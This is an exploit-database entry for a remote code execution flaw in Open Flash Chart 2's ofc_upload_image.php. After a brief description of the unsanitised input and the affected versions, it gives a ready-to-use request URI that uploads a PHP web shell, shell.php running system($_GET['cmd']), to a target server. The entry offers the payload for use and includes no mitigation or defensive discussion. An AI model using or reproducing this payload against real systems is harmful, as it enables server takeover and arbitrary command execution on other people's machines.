Open Flash Chart/Pwiki Remote Code Execution Vulnerability

2010-02-19T00:00:00
ID 1337DAY-ID-10982
Type zdt
Reporter GoLdeN-z3r0
Modified 2010-02-19T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==========================================================
Open Flash Chart/Pwiki Remote Code Execution Vulnerability
==========================================================

Author: GoLdeN-z3r0
Title: Open Flash Chart/Pwiki Remote Code Execution Vulnerability
SITE: Sec-CenTer.CoM
 
Exploit:
 
Open Flash Chart is prone to a vulnerability that lets remote attackers
execute arbitrary code because the application fails to sanitize
user-supplied input.
 
Attackers can exploit this issue to execute arbitrary PHP code within the
context of the affected webserver process.
 
Open Flash Chart 2 Beta 1 and Open Flash Chart 2 are vulnerable; other
versions may also be affected.
 
The following example URI is available:
 
http://server/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?na
me=shell.php&HTTP_RAW_POST_DATA=<?system($_GET['cmd']);?>



#  0day.today [2018-01-04]  #